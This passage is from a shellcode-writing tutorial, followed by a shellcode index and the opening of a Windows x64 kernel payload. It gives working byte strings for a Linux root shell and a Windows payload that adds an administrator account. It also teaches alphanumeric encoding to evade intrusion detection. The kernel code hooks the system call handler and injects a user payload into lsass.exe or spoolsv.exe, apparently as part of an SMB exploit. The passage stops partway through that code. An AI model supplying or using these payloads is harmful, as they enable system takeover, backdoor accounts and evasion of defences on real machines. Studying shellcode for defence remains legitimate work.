              "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x68\x65\x6c\x6c\x6f";

At this point we have a fully functional piece of shellcode that outputs to stdout.
Now that dynamic string addressing has been demonstrated as well as the ability to zero
out registers, we can move on to a piece of code that gets us a shell.


Spawning a Shell

    This code combines what we have been doing so far. This code attempts to set root privileges if they are dropped and then spawns a shell. Note: system(«/bin/sh») would have been a lot simpler right? Well the only problem with that approach is the fact that system always drops privileges.

Remember when reading this code:
    execve (const char *filename, const char** argv, const char** envp);

So, the second two argument expect pointers to pointers. That’s why I load the address of the «/bin/sh» into the string memory and then pass the address of the string memory to the function. When the pointers are dereferenced the target memory will be the «/bin/sh» string.


;shellex.asm
[SECTION .text]

global _start


_start:
        xor eax, eax
        mov al, 70              ;setreuid is syscall 70
        xor ebx, ebx
        xor ecx, ecx
        int 0x80

        jmp short ender

        starter:

        pop ebx                 ;get the address of the string
        xor eax, eax

        mov [ebx+7 ], al        ;put a NULL where the N is in the string
        mov [ebx+8 ], ebx       ;put the address of the string to where the
                                ;AAAA is
        mov [ebx+12], eax       ;put 4 null bytes into where the BBBB is
        mov al, 11              ;execve is syscall 11
        lea ecx, [ebx+8]        ;load the address of where the AAAA was
        lea edx, [ebx+12]       ;load the address of the NULLS
        int 0x80                ;call the kernel, WE HAVE A SHELL!

        ender:
        call starter
        db '/bin/shNAAAABBBB'



steve hanna@1337b0x:~$ nasm -f elf shellex.asm
steve hanna@1337b0x:~$ ld -o shellex shellex.o
steve hanna@1337b0x:~$ objdump -d shellex

shellex:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       b0 46                   mov    $0x46,%al
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 c9                   xor    %ecx,%ecx
 8048088:       cd 80                   int    $0x80
 804808a:       eb 16                   jmp    80480a2 

0804808c :
 804808c:       5b                      pop    %ebx
 804808d:       31 c0                   xor    %eax,%eax
 804808f:       88 43 07                mov    %al,0x7(%ebx)
 8048092:       89 5b 08                mov    %ebx,0x8(%ebx)
 8048095:       89 43 0c                mov    %eax,0xc(%ebx)
 8048098:       b0 0b                   mov    $0xb,%al
 804809a:       8d 4b 08                lea    0x8(%ebx),%ecx
 804809d:       8d 53 0c                lea    0xc(%ebx),%edx
 80480a0:       cd 80                   int    $0x80

080480a2 :
 80480a2:       e8 e5 ff ff ff          call   804808c 
 80480a7:       2f                      das
 80480a8:       62 69 6e                bound  %ebp,0x6e(%ecx)
 80480ab:       2f                      das
 80480ac:       73 68                   jae    8048116 <ender+0x74>
 80480ae:       58                      pop    %eax
 80480af:       41                      inc    %ecx
 80480b0:       41                      inc    %ecx
 80480b1:       41                      inc    %ecx
 80480b2:       41                      inc    %ecx
 80480b3:       42                      inc    %edx
 80480b4:       42                      inc    %edx
 80480b5:       42                      inc    %edx
 80480b6:       42                      inc    %edx
Replace the code at the top with:

char code[] = "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb"\
	      "\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89"\
	      "\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd"\
	      "\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f"\
	      "\x73\x68\x58\x41\x41\x41\x41\x42\x42\x42\x42";</ender+0x74>
This code produces a fully functional shell when injected into an exploit
and demonstrates most of the skills needed to write successful shellcode. Be
aware though, the better one is at assembly, the more functional, robust,
and most of all evil, one's code will be.



Windows Shellcoding

Sleep is for the Weak!

    In order to write successful code, we first need to decide what functions we wish to use for this shellcode and then find their absolute addresses. For this example we just want a thread to sleep for an allotted amount of time. Let’s load up arwin (found above) and get started. Remember, the only module guaranteed to be mapped into the processes address space is kernel32.dll. So for this example, Sleep seems to be the simplest function, accepting the amount of time the thread should suspend as its only argument.

G:\> arwin kernel32.dll Sleep
arwin - win32 address resolution program - by steve hanna - v.01
Sleep is located at 0x77e61bea in kernel32.dll


;sleep.asm
[SECTION .text]

global _start


_start:
        xor eax,eax
        mov ebx, 0x77e61bea ;address of Sleep
        mov ax, 5000        ;pause for 5000ms
        push eax
        call ebx        ;Sleep(ms);



steve hanna@1337b0x:~$ nasm -f elf sleep.asm; ld -o sleep sleep.o; objdump -d sleep
sleep:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       bb ea 1b e6 77          mov    $0x77e61bea,%ebx
 8048087:       66 b8 88 13             mov    $0x1388,%ax
 804808b:       50                      push   %eax
 804808c:       ff d3                   call   *%ebx

Replace the code at the top with:
char code[] = "\x31\xc0\xbb\xea\x1b\xe6\x77\x66\xb8\x88\x13\x50\xff\xd3";

When this code is inserted it will cause the parent thread to suspend for five seconds (note: it will then probably crash because the stack is smashed at this point :-D).

 

A Message to say «Hey»

    This second example is useful in the fact that it will show a shellcoder how to do several things within the bounds of windows shellcoding. Although this example does nothing more than pop up a message box and say «hey», it demonstrates absolute addressing as well as the dynamic addressing using LoadLibrary and GetProcAddress. The library functions we will be using are LoadLibraryA, GetProcAddress, MessageBoxA, and ExitProcess (note: the A after the function name specifies we will be using a normal character set, as opposed to a W which would signify a wide character set; such as unicode). Let’s load up arwin and find the addresses we need to use. We will not retrieve the address of MessageBoxA at this time, we will dynamically load that address.

G:\>arwin kernel32.dll LoadLibraryA
arwin - win32 address resolution program - by steve hanna - v.01
LoadLibraryA is located at 0x77e7d961 in kernel32.dll

G:\>arwin kernel32.dll GetProcAddress
arwin - win32 address resolution program - by steve hanna - v.01
GetProcAddress is located at 0x77e7b332 in kernel32.dll

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll


;msgbox.asm 
[SECTION .text]

global _start


_start:
	;eax holds return value
	;ebx will hold function addresses
	;ecx will hold string pointers
	;edx will hold NULL

	
	xor eax,eax
	xor ebx,ebx			;zero out the registers
	xor ecx,ecx
	xor edx,edx
	
	jmp short GetLibrary
LibraryReturn:
	pop ecx				;get the library string
	mov [ecx + 10], dl		;insert NULL
	mov ebx, 0x77e7d961		;LoadLibraryA(libraryname);
	push ecx			;beginning of user32.dll
	call ebx			;eax will hold the module handle

	jmp short FunctionName
FunctionReturn:

	pop ecx				;get the address of the Function string
	xor edx,edx
	mov [ecx + 11],dl		;insert NULL
	push ecx
	push eax
	mov ebx, 0x77e7b332		;GetProcAddress(hmodule,functionname);
	call ebx			;eax now holds the address of MessageBoxA
	
	jmp short Message
MessageReturn:
	pop ecx				;get the message string
	xor edx,edx			
	mov [ecx+3],dl			;insert the NULL

	xor edx,edx
	
	push edx			;MB_OK
	push ecx			;title
	push ecx			;message
	push edx			;NULL window handle
	
	call eax			;MessageBoxA(windowhandle,msg,title,type); Address

ender:
	xor edx,edx
	push eax			
	mov eax, 0x77e798fd 		;exitprocess(exitcode);
	call eax			;exit cleanly so we don't crash the parent program
	

	;the N at the end of each string signifies the location of the NULL
	;character that needs to be inserted
	
GetLibrary:
	call LibraryReturn
	db 'user32.dllN'
FunctionName
	call FunctionReturn
	db 'MessageBoxAN'
Message
	call MessageReturn
	db 'HeyN'






[steve hanna@1337b0x]$ nasm -f elf msgbox.asm; ld -o msgbox msgbox.o; objdump -d msgbox

msgbox:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       31 db                   xor    %ebx,%ebx
 8048084:       31 c9                   xor    %ecx,%ecx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       eb 37                   jmp    80480c1 

0804808a :
 804808a:       59                      pop    %ecx
 804808b:       88 51 0a                mov    %dl,0xa(%ecx)
 804808e:       bb 61 d9 e7 77          mov    $0x77e7d961,%ebx
 8048093:       51                      push   %ecx
 8048094:       ff d3                   call   *%ebx
 8048096:       eb 39                   jmp    80480d1 

08048098 :
 8048098:       59                      pop    %ecx
 8048099:       31 d2                   xor    %edx,%edx
 804809b:       88 51 0b                mov    %dl,0xb(%ecx)
 804809e:       51                      push   %ecx
 804809f:       50                      push   %eax
 80480a0:       bb 32 b3 e7 77          mov    $0x77e7b332,%ebx
 80480a5:       ff d3                   call   *%ebx
 80480a7:       eb 39                   jmp    80480e2 

080480a9 :
 80480a9:       59                      pop    %ecx
 80480aa:       31 d2                   xor    %edx,%edx
 80480ac:       88 51 03                mov    %dl,0x3(%ecx)
 80480af:       31 d2                   xor    %edx,%edx
 80480b1:       52                      push   %edx
 80480b2:       51                      push   %ecx
 80480b3:       51                      push   %ecx
 80480b4:       52                      push   %edx
 80480b5:       ff d0                   call   *%eax

080480b7 :
 80480b7:       31 d2                   xor    %edx,%edx
 80480b9:       50                      push   %eax
 80480ba:       b8 fd 98 e7 77          mov    $0x77e798fd,%eax
 80480bf:       ff d0                   call   *%eax

080480c1 :
 80480c1:       e8 c4 ff ff ff          call   804808a 
 80480c6:       75 73                   jne    804813b <message+0x59>
 80480c8:       65                      gs
 80480c9:       72 33                   jb     80480fe <message+0x1c>
 80480cb:       32 2e                   xor    (%esi),%ch
 80480cd:       64                      fs
 80480ce:       6c                      insb   (%dx),%es:(%edi)
 80480cf:       6c                      insb   (%dx),%es:(%edi)
 80480d0:       4e                      dec    %esi

080480d1 :
 80480d1:       e8 c2 ff ff ff          call   8048098 
 80480d6:       4d                      dec    %ebp
 80480d7:       65                      gs
 80480d8:       73 73                   jae    804814d <message+0x6b>
 80480da:       61                      popa  
 80480db:       67                      addr16
 80480dc:       65                      gs
 80480dd:       42                      inc    %edx
 80480de:       6f                      outsl  %ds:(%esi),(%dx)
 80480df:       78 41                   js     8048122 <message+0x40>
 80480e1:       4e                      dec    %esi

080480e2 :
 80480e2:       e8 c2 ff ff ff          call   80480a9 
 80480e7:       48                      dec    %eax
 80480e8:       65                      gs
 80480e9:       79 4e                   jns    8048139 <message+0x57>
 </message+0x57></message+0x40></message+0x6b></message+0x1c></message+0x59>
Replace the code at the top with:
char code[] =   "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb\x61\xd9"\
		"\xe7\x77\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb\x32"\
		"\xb3\xe7\x77\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x03\x31\xd2\x52\x51"\
		"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xc4\xff"\
		"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"\
		"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"\
		"\xff\x48\x65\x79\x4e";

This example, while not useful in the fact that it only pops up a message box, illustrates several important concepts when using windows shellcoding. Static addressing as used in most of the example above can be a powerful (and easy) way to whip up working shellcode within minutes. This example shows the process of ensuring that certain DLLs are loaded into a process space. Once the address of the MessageBoxA function is obtained ExitProcess is called to make sure that the program ends without crashing.

 

Example 3 — Adding an Administrative Account

    This third example is actually quite a bit simpler than the previous shellcode, but this code allows the exploiter to add a user to the remote system and give that user administrative privileges. This code does not require the loading of extra libraries into the process space because the only functions we will be using are WinExec and ExitProcess. Note: the idea for this code was taken from the Metasploit project mentioned above. The difference between the shellcode is that this code is quite a bit smaller than its counterpart, and it can be made even smaller by removing the ExitProcess function!

G:\>arwin kernel32.dll ExitProcess
arwin - win32 address resolution program - by steve hanna - v.01
ExitProcess is located at 0x77e798fd in kernel32.dll

G:\>arwin kernel32.dll WinExec
arwin - win32 address resolution program - by steve hanna - v.01
WinExec is located at 0x77e6fd35 in kernel32.dll


;adduser.asm
[Section .text]

global _start

_start:

jmp short GetCommand

CommandReturn:
    	 pop ebx            	;ebx now holds the handle to the string
   	 xor eax,eax
   	 push eax
    	 xor eax,eax        	;for some reason the registers can be very volatile, did this just in case
  	 mov [ebx + 89],al   	;insert the NULL character
  	 push ebx
  	 mov ebx,0x77e6fd35
  	 call ebx           	;call WinExec(path,showcode)

   	 xor eax,eax        	;zero the register again, clears winexec retval
   	 push eax
   	 mov ebx, 0x77e798fd
 	 call ebx           	;call ExitProcess(0);


GetCommand:
    	;the N at the end of the db will be replaced with a null character
    	call CommandReturn
	db "cmd.exe /c net user USERNAME PASSWORD /ADD && net localgroup Administrators /ADD USERNAMEN"

steve hanna@1337b0x:~$ nasm -f elf adduser.asm; ld -o adduser adduser.o; objdump -d adduser

adduser:     file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 1b                   jmp    804809d 

08048082 :
 8048082:       5b                      pop    %ebx
 8048083:       31 c0                   xor    %eax,%eax
 8048085:       50                      push   %eax
 8048086:       31 c0                   xor    %eax,%eax
 8048088:       88 43 59                mov    %al,0x59(%ebx)
 804808b:       53                      push   %ebx
 804808c:       bb 35 fd e6 77          mov    $0x77e6fd35,%ebx
 8048091:       ff d3                   call   *%ebx
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       50                      push   %eax
 8048096:       bb fd 98 e7 77          mov    $0x77e798fd,%ebx
 804809b:       ff d3                   call   *%ebx

0804809d :
 804809d:       e8 e0 ff ff ff          call   8048082 
 80480a2:       63 6d 64                arpl   %bp,0x64(%ebp)
 80480a5:       2e                      cs
 80480a6:       65                      gs
 80480a7:       78 65                   js     804810e <getcommand+0x71>
 80480a9:       20 2f                   and    %ch,(%edi)
 80480ab:       63 20                   arpl   %sp,(%eax)
 80480ad:       6e                      outsb  %ds:(%esi),(%dx)
 80480ae:       65                      gs
 80480af:       74 20                   je     80480d1 <getcommand+0x34>
 80480b1:       75 73                   jne    8048126 <getcommand+0x89>
 80480b3:       65                      gs
 80480b4:       72 20                   jb     80480d6 <getcommand+0x39>
 80480b6:       55                      push   %ebp
 80480b7:       53                      push   %ebx
 80480b8:       45                      inc    %ebp
 80480b9:       52                      push   %edx
 80480ba:       4e                      dec    %esi
 80480bb:       41                      inc    %ecx
 80480bc:       4d                      dec    %ebp
 80480bd:       45                      inc    %ebp
 80480be:       20 50 41                and    %dl,0x41(%eax)
 80480c1:       53                      push   %ebx
 80480c2:       53                      push   %ebx
 80480c3:       57                      push   %edi
 80480c4:       4f                      dec    %edi
 80480c5:       52                      push   %edx
 80480c6:       44                      inc    %esp
 80480c7:       20 2f                   and    %ch,(%edi)
 80480c9:       41                      inc    %ecx
 80480ca:       44                      inc    %esp
 80480cb:       44                      inc    %esp
 80480cc:       20 26                   and    %ah,(%esi)
 80480ce:       26 20 6e 65             and    %ch,%es:0x65(%esi)
 80480d2:       74 20                   je     80480f4 <getcommand+0x57>
 80480d4:       6c                      insb   (%dx),%es:(%edi)
 80480d5:       6f                      outsl  %ds:(%esi),(%dx)
 80480d6:       63 61 6c                arpl   %sp,0x6c(%ecx)
 80480d9:       67 72 6f                addr16 jb 804814b <getcommand+0xae>
 80480dc:       75 70                   jne    804814e <getcommand+0xb1>
 80480de:       20 41 64                and    %al,0x64(%ecx)
 80480e1:       6d                      insl   (%dx),%es:(%edi)
 80480e2:       69 6e 69 73 74 72 61    imul   $0x61727473,0x69(%esi),%ebp
 80480e9:       74 6f                   je     804815a <getcommand+0xbd>
 80480eb:       72 73                   jb     8048160 <getcommand+0xc3>
 80480ed:       20 2f                   and    %ch,(%edi)
 80480ef:       41                      inc    %ecx
 80480f0:       44                      inc    %esp
 80480f1:       44                      inc    %esp
 80480f2:       20 55 53                and    %dl,0x53(%ebp)
 80480f5:       45                      inc    %ebp
 80480f6:       52                      push   %edx
 80480f7:       4e                      dec    %esi
 80480f8:       41                      inc    %ecx
 80480f9:       4d                      dec    %ebp
 80480fa:       45                      inc    %ebp
 80480fb:       4e                      dec    %esi
</getcommand+0xc3></getcommand+0xbd></getcommand+0xb1></getcommand+0xae></getcommand+0x57></getcommand+0x39></getcommand+0x89></getcommand+0x34></getcommand+0x71>

Replace the code at the top with:
 char code[] =  "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x35\xfd\xe6\x77"\
		"\xff\xd3\x31\xc0\x50\xbb\xfd\x98\xe7\x77\xff\xd3\xe8\xe0\xff\xff\xff"\
		"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73"\
		"\x65\x72\x20\x55\x53\x45\x52\x4e\x41\x4d\x45\x20\x50\x41\x53\x53\x57"\
		"\x4f\x52\x44\x20\x2f\x41\x44\x44\x20\x26\x26\x20\x6e\x65\x74\x20\x6c"\
		"\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x41\x64\x6d\x69\x6e\x69\x73"\
		"\x74\x72\x61\x74\x6f\x72\x73\x20\x2f\x41\x44\x44\x20\x55\x53\x45\x52"\
		"\x4e\x41\x4d\x45\x4e";

When this code is executed it will add a user to the system with the specified password, then adds that user to the local Administrators group. After that code is done executing, the parent process is exited by calling ExitProcess.

 

Advanced Shellcoding

    This section covers some more advanced topics in shellcoding. Over time I hope to add quite a bit more content here but for the time being I am very busy. If you have any specific requests for topics in this section, please do not hesitate to email me.

Printable Shellcode

The basis for this section is the fact that many Intrustion Detection Systems detect shellcode because of the non-printable characters that are common to all binary data. The IDS observes that a packet containts some binary data (with for instance a NOP sled within this binary data) and as a result may drop the packet. In addition to this, many programs filter input unless it is alpha-numeric. The motivation behind printable alpha-numeric shellcode should be quite obvious. By increasing the size of our shellcode we can implement a method in which our entire shellcode block in in printable characters. This section will differ a bit from the others presented in this paper. This section will simply demonstrate the tactic with small examples without an all encompassing final example.

Our first discussion starts with obfuscating the ever blatant NOP sled. When an IDS sees an arbitrarily long string of NOPs (0x90) it will most likely drop the packet. To get around this we observe the decrement and increment op codes:



	OP Code        Hex       ASCII
	inc eax        0x40        @
	inc ebx        0x43        C
	inc ecx        0x41        A
	inc edx        0x42        B
	dec eax        0x48        H
	dec ebx        0x4B        K
	dec ecx        0x49        I
	dec edx        0x4A        J

 

It should be pretty obvious that if we insert these operations instead of a NOP sled then the code will not affect the output. This is due to the fact that whenever we use a register in our shellcode we wither move a value into it or we xor it. Incrementing or decrementing the register before our code executes will not change the desired operation.

So, the next portion of this printable shellcode section will discuss a method for making one’s entire block of shellcode alpha-numeric— by means of some major tomfoolery. We must first discuss the few opcodes that fall in the printable ascii range (0x33 through 0x7e).


	sub eax, 0xHEXINRANGE
	push eax
	pop eax
	push esp
	pop esp
	and eax, 0xHEXINRANGE

Surprisingly, we can actually do whatever we want with these instructions. I did my best to keep diagrams out of this talk, but I decided to grace the world with my wonderful ASCII art. Below you can find a diagram of the basic plan for constructing the shellcode.

	The plan works as follows:
		-make space on stack for shellcode and loader
		-execute loader code to construct shellcode
		-use a NOP bridge to ensure that there aren't any extraneous bytes that will crash our code.
		-profit

But now I hear you clamoring that we can’t use move nor can we subtract from esp because they don’t fall into printable characters!!! Settle down, have I got a solution for you! We will use subtract to place values into EAX, push the value to the stack, then pop it into ESP.

Now you’re wondering why I said subtract to put values into EAX, the problem is we can’t use add, and we can’t directly assign nonprintable bytes. How can we overcome this? We can use the fact that each register has only 32 bits, so if we force a wrap around, we can arbitrarily assign values to a register using only printable characters with two to three subtract instructions.

If the gears in your head aren’t cranking yet, you should probably stop reading right now.


	The log awaited ASCII diagram
	1)
	EIP(loader code) --------ALLOCATED STACK SPACE--------ESP

	2)
	---(loader code)---EIP-------STACK------ESP--(shellcode--

	3)
	----loadercode---EIP@ESP----shellcode that was builts---

So, that diagram probably warrants some explanation. Basically, we take our already written shellcode, and generate two to three subtract instructions per four bytes and do the push EAX, pop ESP trick. This basically places the constructed shellcode at the end of the stack and works towards the EIP. So we construct 4 bytes at a time for the entirety of the code and then insert a small NOP bridge (indicated by @) between the builder code and the shellcode. The NOP bridge is used to word align the end of the builder code.

Example code:


	and eax, 0x454e4f4a	;  example of how to zero out eax(unrelated)
	and eax, 0x3a313035
	
	
	push esp
	pop eax
	sub eax, 0x39393333	; construct 860 bytes of room on the stack
	sub eax, 0x72727550	
	sub eax, 0x54545421
	
	push eax		; save into esp
	pop esp

Oh, and I forgot to mention, the code must be inserted in reverse order and the bytes must adhere to the little endian standard.

Shellcodes database

AIX


Alpha


BSD


Cisco


Sco


FreeBSD

Intel x86-64

Intel x86


Hp-Ux


Irix


Linux

ARM

Strong ARM

Super-H

MIPS

PPC

Sparc

CRISv32

Intel x86-64

Intel x86


NetBSD


OpenBSD


OSX

PPC

Intel x86-64

Intel x86


Solaris

MIPS

SPARC

Intel x86


Windows

Windows x64 kernel shellcode from ring 0 to ring 3

The userland shellcode is run in a new thread of system process.
If userland shellcode causes any exception, the system process get killed.
On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to
get call because system call is called on other processors.
The shellcode do not allocate shadow stack if possible for minimal shellcode size.
It is ok because some Windows function does not require shadow stack.
Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
The userland payload MUST be appened to this shellcode.

Reference:
http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c

ASM code:

BITS 64
ORG 0


PSGETCURRENTPROCESS_HASH    EQU    0xdbf47c78
PSGETPROCESSID_HASH    EQU    0x170114e1
PSGETPROCESSIMAGEFILENAME_HASH    EQU    0x77645f3f
LSASS_EXE_HASH    EQU    0xc1fa6a5a
SPOOLSV_EXE_HASH    EQU    0x3ee083d8
ZWALLOCATEVIRTUALMEMORY_HASH    EQU    0x576e99ea
PSGETTHREADTEB_HASH    EQU    0xcef84c3e
KEINITIALIZEAPC_HASH    EQU    0x6d195cc4
KEINSERTQUEUEAPC_HASH    EQU    0xafcc4634
PSGETPROCESSPEB_HASH    EQU    0xb818b848
CREATETHREAD_HASH    EQU    0x835e515e



DATA_PEB_ADDR_OFFSET        EQU -0x10
DATA_QUEUEING_KAPC_OFFSET   EQU -0x8
DATA_ORIGIN_SYSCALL_OFFSET  EQU 0x0
DATA_NT_KERNEL_ADDR_OFFSET  EQU 0x8
DATA_KAPC_OFFSET            EQU 0x10

section .text
global shellcode_start

shellcode_start:

setup_syscall_hook:
    ; IRQL is DISPATCH_LEVEL when got code execution

%ifdef WIN7
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x2c]
    mov [rdx+0x38], ecx
%elifdef WIN8
    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
    add rcx, rdx
    mov [rdx+0x30], rcx
    ; set nByteProcessed to free corrupted buffer after return
    mov ecx, [rdx+0x48]
    mov [rdx+0x40], ecx
%endif
    
    push rbp
    
    call set_rbp_data_address_fn
    
    ; read current syscall
    mov ecx, 0xc0000082
    rdmsr
    ; do NOT replace saved original syscall address with hook syscall
    lea r9, [rel syscall_hook]
    cmp eax, r9d
    je _setup_syscall_hook_done
    
    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    je _hook_syscall
    
    ; save original syscall
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
    
    ; first time on the target
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0

_hook_syscall:
    ; set a new syscall on running processor
    ; setting MSR 0xc0000082 affects only running processor
    xchg r9, rax
    push rax
    pop rdx     ; mov rdx, rax
    shr rdx, 32
    wrmsr
    
_setup_syscall_hook_done:
    pop rbp
    
%ifdef WIN7
    xor eax, eax
%elifdef WIN8
    xor eax, eax
%endif
    ret

;========================================================================
; Find memory address in HAL heap for using as data area
; Return: rbp = data address
;========================================================================
set_rbp_data_address_fn:
    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
    ; Find some address to store the data, the data in this address MUST not be modified
    ;   when exploit is rerun before syscall is called
    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
_set_rbp_data_address_fn_next:
    shr rbp, 12
    shl rbp, 12
    sub rbp, 0x70   ; for KAPC struct too
    ret


syscall_hook:
    swapgs
    mov qword [gs:0x10], rsp
    mov rsp, qword [gs:0x1a8]
    push 0x2b
    push qword [gs:0x10]
    
    push rax    ; want this stack space to store original syscall addr
    ; save rax first to make this function continue to real syscall
    push rax
    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
    call set_rbp_data_address_fn
    mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
    mov [rsp+0x10], rax

    ; save all volatile registers
    push rcx
    push rdx
    push r8
    push r9
    push r10
    push r11
    
    ; use lock cmpxchg for queueing APC only one at a time
    xor eax, eax
    mov dl, 1
    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
    jnz _syscall_hook_done

    ;======================================
    ; restore syscall
    ;======================================
    ; an error after restoring syscall should never occur
    mov ecx, 0xc0000082
    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
    wrmsr
    
    ; allow interrupts while executing shellcode
    sti
    call r3_to_r0_start
    cli
    
_syscall_hook_done:
    pop r11
    pop r10
    pop r9
    pop r8
    pop rdx
    pop rcx
    pop rbp
    pop rax
    ret

r3_to_r0_start:
    ; save used non-volatile registers
    push r15
    push r14
    push rdi
    push rsi
    push rbx
    push rax    ; align stack by 0x10

    ;======================================
    ; find nt kernel address
    ;======================================
    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
    shr r15, 0xc                ; strip to page size
    shl r15, 0xc

_x64_find_nt_walk_page:
    sub r15, 0x1000             ; walk along page size
    cmp word [r15], 0x5a4d      ; 'MZ' header
    jne _x64_find_nt_walk_page
    
    ; save nt address for using in KernelApcRoutine
    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15

    ;======================================
    ; get current EPROCESS and ETHREAD
    ;======================================
    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
    mov edi, PSGETCURRENTPROCESS_HASH
    call win_api_direct
    xchg rcx, rax       ; rcx = EPROCESS
    
    ; r15 : nt kernel address
    ; r14 : ETHREAD
    ; rcx : EPROCESS    
    
    ;======================================
    ; find offset of EPROCESS.ImageFilename
    ;======================================
    mov edi, PSGETPROCESSIMAGEFILENAME_HASH
    call get_proc_addr
    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename


    ;======================================
    ; find offset of EPROCESS.ThreadListHead
    ;======================================
    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
%ifdef WIN7
    lea rdx, [rax+0x28]
%elifdef WIN8
    lea rdx, [rax+0x38]
%else
    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
    jb _find_eprocess_threadlist_offset_win7
    add eax, 0x10
_find_eprocess_threadlist_offset_win7:
    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
%endif

    
    ;======================================
    ; find offset of ETHREAD.ThreadListEntry
    ;======================================
%ifdef COMPACT
    lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
%else
    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
    mov r9, r8
%endif
    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
_find_ethread_threadlist_offset_loop:
    mov r9, qword [r9]
%ifndef COMPACT
    cmp r8, r9          ; check end of list
    je _insert_queue_apc_done    ; not found !!!
%endif
    ; if (r9 - r14 < 0x700) found
    mov rax, r9
    sub rax, r14
    cmp rax, 0x700
    ja _find_ethread_threadlist_offset_loop
    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)


    ;======================================
    ; find offset of EPROCESS.ActiveProcessLinks
    ;======================================
    mov edi, PSGETPROCESSID_HASH
    call get_proc_addr
    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
    

    ;======================================
    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
    ;======================================
    ; check process name
_find_target_process_loop:
    lea rsi, [rcx+rbx]
    call calc_hash
    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
%ifndef COMPACT
    jz found_target_process
    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
%endif
    jz found_target_process
    ; next process
    mov rcx, [rcx+rdi]
    sub rcx, rdi
    jmp _find_target_process_loop


found_target_process:
    ; The allocation for userland payload will be in KernelApcRoutine.
    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()

    ;======================================
    ; save process PEB for finding CreateThread address in kernel KAPC routine
    ;======================================
    mov edi, PSGETPROCESSPEB_HASH
    ; rcx is EPROCESS. no need to set it.
    call win_api_direct
    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
    
    
    ;======================================
    ; iterate ThreadList until KeInsertQueueApc() success
    ;======================================
    ; r15 = nt
    ; r14 = -(offset of ETHREAD.ThreadListEntry)
    ; rcx = EPROCESS
    ; edx = offset of EPROCESS.ThreadListHead

%ifdef COMPACT
    lea rbx, [rcx + rdx]
%else
    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
